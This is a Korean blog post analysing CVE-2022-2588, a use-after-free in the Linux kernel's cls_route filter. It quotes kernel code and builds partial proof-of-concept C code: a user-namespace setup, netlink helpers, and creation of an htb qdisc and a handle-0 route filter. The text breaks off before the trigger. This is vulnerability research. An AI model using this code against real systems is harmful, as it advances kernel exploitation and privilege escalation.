CVE-2022-2588: Use After Free In Linux Kernel Cls Route Module

· omacs's blog


Table of Contents

Introduction #

0xCD4님은 Kernel CTF Lab의 문제 중 objstore로 CVE-2022-2588을 묘사했다. 이 취약점은 리눅스 커널의 Traffic Control (TC) 서브시스템에서 필터 기능을 수행하는 cls_route 모듈에서 발생한 use-after-free (UAF)이다. 본 글에서는 커널 5.18 버전을 기준으로 UAF가 어떻게 발생하는지 알아보고, proof-of-concept (PoC) 코드를 작성해볼 것이다[1, 2].

Root Cause Analysis #

Cls_route 모듈은 다음과 같이 route4_filter 구조체를 정의하여 필터를 연결 리스트로 다룬다 (net/sched/cls_route.c에서 발췌)[3].

 1struct route4_filter {
 2  struct route4_filter __rcu  *next;
 3  u32         id;
 4  int         iif;
 5
 6  struct tcf_result   res;
 7  struct tcf_exts     exts;
 8  u32         handle;
 9  struct route4_bucket    *bkt;
10  struct tcf_proto    *tp;
11  struct rcu_work     rwork;
12};

그리고 이 리스트의 헤드는 route4_head와 route4_bucket 구조체에 배열 형태로 구성되어 있다 (net/sched/cls_route.c에서 발췌)[3].

 1struct route4_head {
 2  struct route4_fastmap       fastmap[16];
 3  struct route4_bucket __rcu  *table[256 + 1];
 4  struct rcu_head         rcu;
 5};
 6
 7struct route4_bucket {
 8  /* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
 9  struct route4_filter __rcu  *ht[16 + 16 + 1];
10  struct rcu_head         rcu;
11};

이때 그 인덱스는 route4_filter 구조체의 handle 멤버 변수에 저장되는 값에 해시를 적용하여 얻는다. 이는 route4_get 함수 구현을 읽어보면 감을 잡을 수 있다 (net/sched/cls_route.c에서 발췌)[3].

 1static void *route4_get(struct tcf_proto *tp, u32 handle)
 2{
 3  struct route4_head *head = rtnl_dereference(tp->root);
 4  struct route4_bucket *b;
 5  struct route4_filter *f;
 6  unsigned int h1, h2;
 7
 8  h1 = to_hash(handle);
 9  if (h1 > 256)
10      return NULL;
11
12  h2 = from_hash(handle >> 16);
13  if (h2 > 32)
14      return NULL;
15
16  b = rtnl_dereference(head->table[h1]);
17  if (b) {
18      for (f = rtnl_dereference(b->ht[h2]);
19           f;
20           f = rtnl_dereference(f->next))
21          if (f->handle == handle)
22              return f;
23  }
24  return NULL;
25}

Route4_change 함수는 tc_new_tfilter 함수가 change 함수 포인터로 호출하며, 새로 생성한 필터 (f 포인터 변수)로 기존의 필터 (fold 포인터 변수)를 대체한다. 문제는 기존 필터의 handle 멤버값이 0이면 리스트에서는 제거되지 않는데 ({1}), 메모리 해제는 된다 ({2})는 것이다 (net/sched/cls_route.c에서 발췌)[3].

 1static int route4_change(struct net *net, struct sk_buff *in_skb,
 2           struct tcf_proto *tp, unsigned long base, u32 handle,
 3           struct nlattr **tca, void **arg, u32 flags,
 4           struct netlink_ext_ack *extack)
 5{
 6  struct route4_head *head = rtnl_dereference(tp->root);
 7  struct route4_filter __rcu **fp;
 8  struct route4_filter *fold, *f1, *pfp, *f = NULL;
 9  struct route4_bucket *b;
10  struct nlattr *opt = tca[TCA_OPTIONS];
11  struct nlattr *tb[TCA_ROUTE4_MAX + 1];
12  unsigned int h, th;
13  int err;
14  bool new = true;
15
16    /* ... */
17
18  fold = *arg;
19  if (fold && handle && fold->handle != handle)
20          return -EINVAL;
21
22  err = -ENOBUFS;
23  f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
24  if (!f)
25      goto errout;
26
27    /* ... */
28
29  if (fold) {
30      f->id = fold->id;
31      f->iif = fold->iif;
32      f->res = fold->res;
33      f->handle = fold->handle;
34
35      f->tp = fold->tp;
36      f->bkt = fold->bkt;
37      new = false;
38  }
39
40    /* ... */
41
42  if (fold && fold->handle && f->handle != fold->handle) { /* {1} */
43      th = to_hash(fold->handle);
44      h = from_hash(fold->handle >> 16);
45      b = rtnl_dereference(head->table[th]);
46      if (b) {
47          fp = &b->ht[h];
48          for (pfp = rtnl_dereference(*fp); pfp;
49               fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
50              if (pfp == fold) {
51                  rcu_assign_pointer(*fp, fold->next);
52                  break;
53              }
54          }
55      }
56  }
57
58  route4_reset_fastmap(head);
59  *arg = f;
60  if (fold) {                 /* {2} */
61      tcf_unbind_filter(tp, &fold->res);
62      tcf_exts_get_net(&fold->exts);
63      tcf_queue_work(&fold->rwork, route4_delete_filter_work);
64  }
65  return 0;
66
67errout:
68  if (f)
69      tcf_exts_destroy(&f->exts);
70  kfree(f);
71  return err;
72}

Proof of Concept #

User namespace and capabilities #

이 취약점을 트리거하기 위해서는 CAP_NETADMIN 이상의 권한이 필요하며, 이는 다음 소스로 확인할 수 있다 (net/sched/cls_api.c에서 발췌)[3].

 1static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
 2            struct netlink_ext_ack *extack)
 3{
 4  struct net *net = sock_net(skb->sk);
 5
 6    /* ... */
 7
 8  if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
 9      return -EPERM;
10
11    /* ... */
12}

그리고 일반 사용자가 이 권한을 표면적으로라도 얻기 위해서는 새로운 네임스페이스로 옮겨가야 한다. 이 네임스페이스는 unshare 시스템 콜에 CLONE_NEWUSER | CLONE_NEWNET 플래그를 주어 얻을 수 있다[9, 10].

Netlink는 사용자와 커널이 소통하기 위한 소켓 기반 인터페이스이다. Socket 시스템 콜의 protocol 파라미터가 여기서는 소통하고자 하는 서브시스템을 구분하는데 사용된다. 특히 여기서 다루는 TC 관련 기능에 접근할 때는 NETLINK_ROUTE로 지칭되는 rtnetlink를 쓴다. 이를 사용해서 커널과 통신할 때는 다음과 같은 형태의 메시지를 구성하여 전송한다[4, 5, 6].

1[ Netlink message header ][ Subsystem message header ][ Attributes ]
2
3@ Subsystem message header structures: struct tcmsg, etc.

위 Netlink message header는 nlmsghdr 구조체로 다음과 같이 정의돼 있다 (include/uapi/linux/netlink.h에서 발췌)[3].

1struct nlmsghdr {
2  __u32       nlmsg_len;  /* Length of message including header */
3  __u16       nlmsg_type; /* Message content */
4  __u16       nlmsg_flags;    /* Additional flags */
5  __u32       nlmsg_seq;  /* Sequence number */
6  __u32       nlmsg_pid;  /* Sending process port ID */
7};

그리고 Subsystem message header는 어느 서브시스템과 통신하는지에 따라 달라진다. 예를 들어, TC에 접근한다면 tcmsg 구조체를 쓰며, 다음과 같이 정의돼 있다 (include/uapi/linux/rtnetlink.h에서 발췌)[3].

 1struct tcmsg {
 2  unsigned char   tcm_family;
 3  unsigned char   tcm__pad1;
 4  unsigned short  tcm__pad2;
 5  int     tcm_ifindex;
 6  __u32       tcm_handle;
 7  __u32       tcm_parent;
 8/* tcm_block_index is used instead of tcm_parent
 9 * in case tcm_ifindex == TCM_IFINDEX_MAGIC_BLOCK
10 */
11#define tcm_block_index tcm_parent
12  __u32       tcm_info;
13};

Attributes도 위와 마찬가지로 어떤 netlink로 메시지를 전송하는지에 따라 달라진다. 예를 들어, rtnetlink를 쓴다면, rtattr 구조체를 사용한다 (include/uapi/linux/rtnetlink.h에서 발췌)[3, 5].

 1/* 
 2   Generic structure for encapsulation of optional route information.
 3   It is reminiscent of sockaddr, but with sa_family replaced
 4   with attribute type.
 5 */
 6
 7struct rtattr {
 8  unsigned short  rta_len;
 9  unsigned short  rta_type;
10};

Rtnetlink는 RTM_ 메시지 타입군을 가지며, rtnl_register 함수를 사용하여 해당 메시지 타입에 동작할 함수를 매핑한다 (net/core/rtnetlink.c에서 발췌)[3, 5].

 1/**
 2 * rtnl_register - Register a rtnetlink message type
 3 * @protocol: Protocol family or PF_UNSPEC
 4 * @msgtype: rtnetlink message type
 5 * @doit: Function pointer called for each request message
 6 * @dumpit: Function pointer called for each dump request (NLM_F_DUMP) message
 7 * @flags: rtnl_link_flags to modify behaviour of doit/dumpit functions
 8 *
 9 * Registers the specified function pointers (at least one of them has
10 * to be non-NULL) to be called whenever a request message for the
11 * specified protocol family and message type is received.
12 *
13 * The special protocol family PF_UNSPEC may be used to define fallback
14 * function pointers for the case when no entry for the specific protocol
15 * family exists.
16 */
17void rtnl_register(int protocol, int msgtype,
18         rtnl_doit_func doit, rtnl_dumpit_func dumpit,
19         unsigned int flags)
20{
21  int err;
22
23  err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
24                   flags);
25  if (err)
26      pr_err("Unable to register rtnetlink message handler, "
27             "protocol = %d, message type = %d\n", protocol, msgtype);
28}
 1void __init rtnetlink_init(void)
 2{
 3    /* ... */
 4
 5  rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
 6            rtnl_dump_ifinfo, 0);
 7  rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
 8  rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
 9  rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);
10
11  rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
12  rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
13  rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);
14
15  rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
16  rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);
17
18  rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
19  rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
20  rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);
21
22  rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
23  rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
24  rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);
25
26  rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
27            0);
28  rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
29}

위와 같이 등록하는 것은 rtnetlink로 접근하는 TC 관련 API에도 있다. 예를 들어, classifier API는 필터 관련 타입을 등록한다 (net/sched/cls_api.c에서 발췌)[3].

 1static int __init tc_filter_init(void)
 2{
 3  int err;
 4
 5    /* ... */
 6
 7  rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
 8            RTNL_FLAG_DOIT_UNLOCKED);
 9  rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
10            RTNL_FLAG_DOIT_UNLOCKED);
11  rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
12            tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
13  rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
14  rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
15  rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
16            tc_dump_chain, 0);
17
18  return 0;
19
20    /* ... */
21}

이러한 타입들을 nlmsghdr 구조체의 nlmsg_type 멤버에 담아서 전송하면 매핑된 함수가 호출된다.

Netlink 메시지를 직접 구성하여 전송하고 그 답신을 해석하려면 여러가지를 고려해야 한다. 그래서 메시지를 송수신하는 것은 이미 작성된 라이브러리 함수를 사용하는 편이 낫다고 볼 수 있다. moises-silva님은 이 목표에 가장 부합하는 예제를 소개했다. 이때, libnetlink.h와 libnetlink.c 파일은 iproute2 소스로부터 얻으면 된다[7, 8].


moises-silva님의 예제에서도 볼 수 있듯이, libnetlink를 사용하여 통신하는 것은 다음과 같이 일정한 틀을 가진다[7].

  1. Open rtnetlink (rtnl) handle
  2. Set netlink message header
  3. Set subsystem message header (e.g., tcmsg)
  4. Set attributes
  5. Call rtnl_talk function
  6. Close rtnetlink (rtnl) handle

그럼 이를 바탕으로 Queueing Discipline 정보를 읽는 예제를 작성해보자. 이때 iproute2의 tc_qdisc.c 파일을 참고하면 헤더를 어떻게 설정해야 하는지 알 수 있다. 이에 예제를 작성하면 다음과 같다[8].

  1#define _GNU_SOURCE
  2
  3#include <stdio.h>
  4#include <string.h>
  5#include <stdlib.h>
  6#include <stdint.h>
  7#include <stdbool.h>
  8#include <signal.h>
  9#include <time.h>
 10#include <sys/mman.h>
 11#include <sys/types.h>
 12#include <sys/utsname.h>
 13#include <sys/wait.h>
 14#include <sys/socket.h>
 15#include <sys/ioctl.h>
 16#include <sys/uio.h>
 17#include <unistd.h>
 18#include <sched.h>
 19#include <fcntl.h>
 20#include <syslog.h>
 21#include <errno.h>
 22#include <netinet/in.h>
 23#include <arpa/inet.h>
 24#include <net/if.h>
 25#include <net/if_arp.h>
 26#include <linux/if_link.h>
 27#include <linux/neighbour.h>
 28#include <linux/netconf.h>
 29#include <linux/if_ether.h>
 30#include <asm/types.h>
 31#include <linux/netlink.h>
 32#include <linux/rtnetlink.h>
 33#include <libnl3/netlink/route/tc.h>
 34#include <libnl3/netlink/route/qdisc.h>
 35#include <libnl3/netlink/route/qdisc/tbf.h>
 36
 37/* ----------------------< libnetlink >--------------------------------- */
 38
 39struct rtnl_handle {
 40	int			fd;
 41	struct sockaddr_nl	local;
 42	struct sockaddr_nl	peer;
 43	__u32			seq;
 44	__u32			dump;
 45	int			proto;
 46	FILE		       *dump_fp;
 47#define RTNL_HANDLE_F_LISTEN_ALL_NSID		0x01
 48	int			flags;
 49};
 50
 51#define NLMSG_TAIL(nmsg)                                                \
 52	((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
 53
 54
 55static inline const char *rta_getattr_str(const struct rtattr *rta)
 56{
 57	return (const char *)RTA_DATA(rta);
 58}
 59
 60static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
 61                     int alen)
 62{
 63	int len = RTA_LENGTH(alen);
 64	struct rtattr *rta;
 65
 66	if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
 67		fprintf(stderr,
 68                "addattr_l ERROR: message exceeded bound of %d\n",
 69                maxlen);
 70		return -1;
 71	}
 72	rta = NLMSG_TAIL(n);
 73	rta->rta_type = type;
 74	rta->rta_len = len;
 75	memcpy(RTA_DATA(rta), data, alen);
 76	n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
 77	return 0;
 78}
 79
 80static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
 81{
 82	return addattr_l(n, maxlen, type, &data, sizeof(__u32));
 83}
 84
 85static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
 86{
 87	return addattr_l(n, maxlen, type, &data, sizeof(__u64));
 88}
 89
 90static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
 91{
 92	struct rtattr *nest = NLMSG_TAIL(n);
 93
 94	addattr_l(n, maxlen, type, NULL, 0);
 95    /* addattr_l(n, maxlen, type, &nest, 8); */
 96	return nest;
 97}
 98
 99static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
100{
101	nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
102	return n->nlmsg_len;
103}
104
105#ifndef SOL_NETLINK
106#define SOL_NETLINK 270
107#endif
108
109#ifndef MIN
110#define MIN(a, b) ((a) < (b) ? (a) : (b))
111#endif
112
113static int rcvbuf =1024 * 1024;
114
115static void rtnl_close(struct rtnl_handle *rth)
116{
117	if (rth->fd >= 0) {
118		close(rth->fd);
119		rth->fd = -1;
120	}
121}
122
123static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
124                             int protocol)
125{
126	socklen_t addr_len;
127	int sndbuf = 32768;
128
129	memset(rth, 0, sizeof(*rth));
130
131	rth->proto = protocol;
132	rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
133	if (rth->fd < 0) {
134		perror("Cannot open netlink socket");
135		return -1;
136	}
137
138	if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
139                   &sndbuf, sizeof(sndbuf)) < 0) {
140		perror("SO_SNDBUF");
141		return -1;
142	}
143
144	if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
145                   &rcvbuf, sizeof(rcvbuf)) < 0) {
146		perror("SO_RCVBUF");
147		return -1;
148	}
149
150	memset(&rth->local, 0, sizeof(rth->local));
151	rth->local.nl_family = AF_NETLINK;
152	rth->local.nl_groups = subscriptions;
153
154	if (bind(rth->fd, (struct sockaddr *)&rth->local,
155             sizeof(rth->local)) < 0) {
156		perror("Cannot bind netlink socket");
157		return -1;
158	}
159	addr_len = sizeof(rth->local);
160	if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
161                    &addr_len) < 0) {
162		perror("Cannot getsockname");
163		return -1;
164	}
165	if (addr_len != sizeof(rth->local)) {
166		fprintf(stderr, "Wrong address length %d\n", addr_len);
167		return -1;
168	}
169	if (rth->local.nl_family != AF_NETLINK) {
170		fprintf(stderr, "Wrong address family %d\n",
171                rth->local.nl_family);
172		return -1;
173	}
174	rth->seq = time(NULL);
175	return 0;
176}
177
178static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
179{
180	return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
181}
182
183static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
184                       struct nlmsghdr *answer, size_t maxlen,
185                       bool show_rtnl_err)
186{
187	int status;
188	unsigned int seq;
189	struct nlmsghdr *h;
190	struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
191	struct iovec iov = {
192		.iov_base = n,
193		.iov_len = n->nlmsg_len
194	};
195	struct msghdr msg = {
196		.msg_name = &nladdr,
197		.msg_namelen = sizeof(nladdr),
198		.msg_iov = &iov,
199		.msg_iovlen = 1,
200	};
201	char   buf[32768] = {};
202
203	n->nlmsg_seq = seq = ++rtnl->seq;
204
205	if (answer == NULL)
206		n->nlmsg_flags |= NLM_F_ACK;
207
208	status = sendmsg(rtnl->fd, &msg, 0);
209	if (status < 0) {
210		perror("Cannot talk to rtnetlink");
211		return -1;
212	}
213
214	iov.iov_base = buf;
215	while (1) {
216		iov.iov_len = sizeof(buf);
217		status = recvmsg(rtnl->fd, &msg, 0);
218
219		if (status < 0) {
220			if (errno == EINTR || errno == EAGAIN)
221				continue;
222			fprintf(stderr, "netlink receive error %s (%d)\n",
223                    strerror(errno), errno);
224			return -1;
225		}
226		if (status == 0) {
227			fprintf(stderr, "EOF on netlink\n");
228			return -1;
229		}
230		if (msg.msg_namelen != sizeof(nladdr)) {
231			fprintf(stderr,
232                    "sender address length == %d\n",
233                    msg.msg_namelen);
234			exit(1);
235		}
236		for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
237			int len = h->nlmsg_len;
238			int l = len - sizeof(*h);
239
240            /* DumpHex(&msg, len); */
241
242			if (l < 0 || len > status) {
243				if (msg.msg_flags & MSG_TRUNC) {
244					fprintf(stderr, "Truncated message\n");
245					return -1;
246				}
247				fprintf(stderr,
248                        "!!!malformed message: len=%d\n",
249                        len);
250				exit(1);
251			}
252
253			if (nladdr.nl_pid != 0 ||
254			    h->nlmsg_pid != rtnl->local.nl_pid ||
255			    h->nlmsg_seq != seq) {
256				/* Don't forget to skip that message. */
257				status -= NLMSG_ALIGN(len);
258				h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
259				continue;
260			}
261
262			if (h->nlmsg_type == NLMSG_ERROR) {
263				struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);
264
265				if (l < sizeof(struct nlmsgerr)) {
266					fprintf(stderr, "ERROR truncated\n");
267				} else if (!err->error) {
268					if (answer)
269						memcpy(answer, h,
270						       MIN(maxlen, h->nlmsg_len));
271					return 0;
272				}
273
274				if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
275					fprintf(stderr,
276                            "RTNETLINK answers: %s\n",
277                            strerror(-err->error));
278				errno = -err->error;
279				return -1;
280			}
281
282			if (answer) {
283				memcpy(answer, h,
284				       MIN(maxlen, h->nlmsg_len));
285				return 0;
286			}
287
288			fprintf(stderr, "Unexpected reply!!!\n");
289
290			status -= NLMSG_ALIGN(len);
291			h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
292		}
293
294		if (msg.msg_flags & MSG_TRUNC) {
295			fprintf(stderr, "Message truncated\n");
296			continue;
297		}
298
299		if (status) {
300			fprintf(stderr, "!!!Remnant of size %d\n", status);
301			exit(1);
302		}
303	}
304}
305
306static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
307                     struct nlmsghdr *answer, size_t maxlen)
308{
309	return __rtnl_talk(rtnl, n, answer, maxlen, true);
310}
311
312static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
313                              int len, unsigned short flags)
314{
315	unsigned short type;
316
317	memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
318	while (RTA_OK(rta, len)) {
319		type = rta->rta_type & ~flags;
320		if ((type <= max) && (!tb[type]))
321			tb[type] = rta;
322		rta = RTA_NEXT(rta, len);
323	}
324	if (len)
325		fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
326                len, rta->rta_len);
327	return 0;
328}
329
330/* --------------------------------------------------------------------- */
331
332enum {
333    TCA_BUF_MAX = (64 * 1024)
334};
335
336struct tc_req {
337    struct nlmsghdr hdr;
338    struct tcmsg tchdr;
339    uint8_t buf[TCA_BUF_MAX];
340};
341
342#define LOG printf
343#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
344
345void die(const char *funcname)
346{
347    perror(funcname);
348    exit(EXIT_FAILURE);
349}
350
351void print_qdisc_info(const char *ifname)
352{
353    int err;
354    struct nlmsghdr res;
355    struct tcmsg *t;
356    struct rtattr *tb[TCA_MAX + 1];
357    struct rtnl_handle rth;
358    struct tc_req qdreq;
359
360    LOG_FUNC();
361
362    /* 1. Open rtnl handle */
363    err = rtnl_open(&rth, 0);
364    if (err)
365        die("rtnl_open");
366
367    /* 2. Set netlink message header */
368    bzero(&qdreq, sizeof(qdreq));
369    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
370    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
371    qdreq.hdr.nlmsg_type = RTM_GETQDISC;
372
373    /* 3. Set subsystem message header */
374    qdreq.tchdr.tcm_family = AF_UNSPEC;
375    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
376    printf("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);
377
378    /* 4. Set attributes (Not needed for this example) */
379
380    /* 5. Call rtnl_talk function */
381    err = rtnl_talk(&rth, &qdreq.hdr, &res, TCA_BUF_MAX);
382    if (err < 0)
383        die("rtnl_talk");
384
385    /* Parse and print response from the kernel */
386    t = NLMSG_DATA(&res);
387    if (res.nlmsg_type != RTM_NEWQDISC && res.nlmsg_type != RTM_DELQDISC)
388        die("Not a qdisc");
389
390    /* rtattr_parser(tb, */
391    /*               TCA_MAX, */
392    /*               TCA_RTA(t), */
393    /*               res.nlmsg_len - NLMSG_LENGTH(sizeof(*t))); */
394    parse_rtattr_flags(tb, TCA_MAX, TCA_RTA(t), res.nlmsg_len - NLMSG_LENGTH(sizeof(*t)), NLA_F_NESTED);
395    printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
396           t->tcm_handle >> 16, t->tcm_handle);
397
398    /* 6. Close rtnetlink handle */
399    rtnl_close(&rth);
400}
401
402int main()
403{
404    print_qdisc_info("lo");
405    return 0;
406}

Traffic Control Queueing Discipline #

Queueing discipline (Qdisc)은 커널이 패킷을 네트워크 어댑터 드라이버에 전달하기 전에 큐잉하는 규칙을 정의한다. 이때 클래스를 통해 큐에서 패킷을 가져올 때의 우선순위를 정할 수 있고, 이들을 classful qdisc라고 한다. 그리고 필터는 큐에 패킷을 넣을 때 어떤 클래스에 넣을지 분류하는 역할을 수행한다. 그래서 필터는 classful qdisc가 사용하고, 필터를 추가하려면 해당 네트워크 인터페이스의 qdisc가 classful 해야 한다[11].


경험적으로 루프백 디바이스는 qdisc가 noqueue로 설정되어 있거나, 설정되어 있지 않은 경우가 있음을 알 수 있다. 그래서 classful qdisc에 속하는 htb로 설정할 것이다. 이를 위해 설정해야 하는 요소들은 다음과 같다[3, 8].

nlmsghdr member Value
nlmsg_len NLMSG_LENGTH(sizeof(< subsystem header structure variable >))
nlmsg_flags NLM_FREQUEST OR NLM_FCREATE
nlmsg_type RTM_NEWQDISC
tcmsg member Value
tcm_family AF_UNSPEC
tcm_ifindex ifindex of network interface
tcm_handle 32-bit handle (e.g., 0x10000)
tcm_parent parent or TC_HROOT
Attribute Value
TCA_KIND "htb"
TCA_OPTIONS Not NULL
TCA_HTBINIT Set by using tc_htbglob structure and version member shall be 0x30011 >> 16

위 표의 값을 설정하여 커널에 요청하는 함수는 다음과 같이 작성할 수 있다.

 1enum {
 2    TCA_BUF_MAX = (64 * 1024)
 3};
 4
 5struct tc_req {
 6    struct nlmsghdr hdr;
 7    struct tcmsg tchdr;
 8    uint8_t buf[TCA_BUF_MAX];
 9};
10
11void die(const char *funcname)
12{
13    perror(funcname);
14    exit(EXIT_FAILURE);
15}
16
17#define LOG printf
18#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
19
20void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
21                     uint32_t handle, const char *kind)
22{
23    int err;
24    struct rtnl_handle rth;
25    struct tc_req qdreq;
26    struct rtattr *tail;
27    struct tc_htb_glob glob;
28
29    LOG_FUNC();
30
31    err = rtnl_open(&rth, 0);
32    if (err)
33        die("rtnl_open");
34
35    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
36    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
37    qdreq.hdr.nlmsg_type = cmd;
38
39    qdreq.tchdr.tcm_family = AF_UNSPEC;
40    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
41    qdreq.tchdr.tcm_handle = handle;
42    qdreq.tchdr.tcm_parent = TC_H_ROOT;
43
44    /* Set attributes */
45    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_KIND, kind, strlen(kind));
46    tail = addattr_nest(&qdreq.hdr, sizeof(qdreq), TCA_OPTIONS);
47    bzero(&glob, sizeof(glob));
48    glob.version = 0x00030011 >> 16;
49    addattr_l(&qdreq.hdr, sizeof(qdreq), TCA_HTB_INIT,
50              &glob, sizeof(glob));
51    addattr_nest_end(&qdreq.hdr, tail);
52
53    err = rtnl_talk(&rth, &qdreq.hdr, NULL, 0);
54    if (err < 0)
55        die("rtnl_talk");
56
57    rtnl_close(&rth);
58}
59
60int main(int argc, char *argv[])
61{
62    int res;
63
64    res = unshare(CLONE_NEWUSER | CLONE_NEWNET);
65    if (res == -1)
66        die("unshare");
67
68    user_tc_modify_qdisc("lo",
69                    RTM_NEWQDISC,
70                    NLM_F_CREATE,
71                    0x10000,
72                    "htb");
73    return 0;
74}
75

Traffic Control Filter #

이 취약점은 handle이 0인 필터를 지울 때 발생가능하다. 그럴려면 이 필터를 생성해야 한다. 이를 위해 설정해야 하는 요소들은 다음과 같다[3, 8].

nlmsghdr member Value
nlmsg_len NLMSG_LENGTH(sizeof(< subsystem header structure variable >))
nlmsg_flags NLM_FREQUEST OR NLM_FCREATE
nlmsg_type RTM_NEWTFILTER

tcmsg member Value
tcm_family AF_UNSPEC
tcm_ifindex ifindex of network interface
tcm_info 32 bits value, which prio for high 16 bits that is not zero and proto for low 16 bits (e.g., prio=0xbeef and proto=ETH_PLOOP)
tcm_handle 0x0

Attribute Value
TCA_KIND "route"
TCA_OPTIONS Not NULL
TCA_ROUTE4TO 0x100000000 (64-bit)
TCA_ROUTE4FROM 0x100000000 (64-bit)

이때 prio는 route4_get 함수가 여러 번의 호출에도 같은 head 포인터를 얻기 위해 0이 아닌 값으로 설정한다. 이 작업을 수행하는 함수는 다음과 같이 작성할 수 있다[3].

 1enum {
 2    TCA_BUF_MAX = (64 * 1024)
 3};
 4
 5struct tc_req {
 6    struct nlmsghdr hdr;
 7    struct tcmsg tchdr;
 8    uint8_t buf[TCA_BUF_MAX];
 9};
10
11void die(const char *funcname)
12{
13    perror(funcname);
14    exit(EXIT_FAILURE);
15}
16
17#define LOG printf
18#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)
19
20void user_tc_new_tfilter(const char *ifname, int cmd,
21                    unsigned int flags, uint32_t handle, uint16_t prio,
22                    uint16_t proto,
23                    const char *kind, uint64_t from, uint64_t to)
24{
25    int err;
26    struct rtnl_handle rthdle;
27    struct tc_req req;
28    struct rtattr *tail;
29
30    LOG_FUNC();
31
32    err = rtnl_open(&rthdle, 0);
33    if (err < 0)
34        die("rtnl_open");
35
36    bzero(&req, sizeof(req));
37    req.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req.tchdr));
38    req.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
39    req.hdr.nlmsg_type = cmd;
40
41    req.tchdr.tcm_family = AF_UNSPEC;
42    req.tchdr.tcm_ifindex = if_nametoindex(ifname);
43    req.tchdr.tcm_info = TC_H_MAKE(prio << 16, proto);
44    req.tchdr.tcm_handle = handle;
45
46    addattr_l(&req.hdr, sizeof(req),
47              TCA_KIND,
48              kind, strlen(kind));
